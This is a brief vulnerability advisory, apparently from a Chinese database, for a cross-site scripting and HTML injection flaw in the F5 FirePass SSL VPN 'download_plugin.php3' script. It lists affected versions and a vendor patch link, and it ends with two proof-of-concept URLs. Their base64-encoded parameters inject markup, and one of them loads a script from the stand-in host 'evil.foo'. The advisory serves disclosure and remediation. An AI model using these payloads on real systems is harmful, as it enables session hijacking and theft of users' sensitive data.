BUGTRAQ ID: 26412
CNCAN ID:CNCAN-2007111602
PR07-13: Cross-site Scripting / HTML injection on F5 FirePass 4100 SSL VPN ‘download_plugin.php3’ server-side script
F5 FirePass是一款安全套接层虚拟专用网(SSL VPN)解决方案。
F5 FirePass包含的Download_Plugin.PHP3不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行跨站脚本攻击获得敏感信息。
问题是由于’Download_Plugin.PHP3’脚本对用户提交的WEB参数缺少过滤,提交恶意脚本代码作为参数,并诱使用户访问,可导致获得目标用户敏感信息。
F5 FirePass 4100 5.4.2
F5 FirePass 4100 0
F5 FirePass 6.0.1
F5 FirePass 5.5.2
F5 FirePass 6.0
F5 FirePass 5.4
F5 FirePass
可参考如下补丁解决方案:
<a href=“https://support.f5.com/kb/en-us/solutions/public/7000/400/sol7498.html " target=”_blank">https://support.f5.com/kb/en-us/solutions/public/7000/400/sol7498.html </a>
https://www.example.com/download_plugin.php3?js=&amp;backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
https://www.example.com/download_plugin.php3?js=&amp;backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rp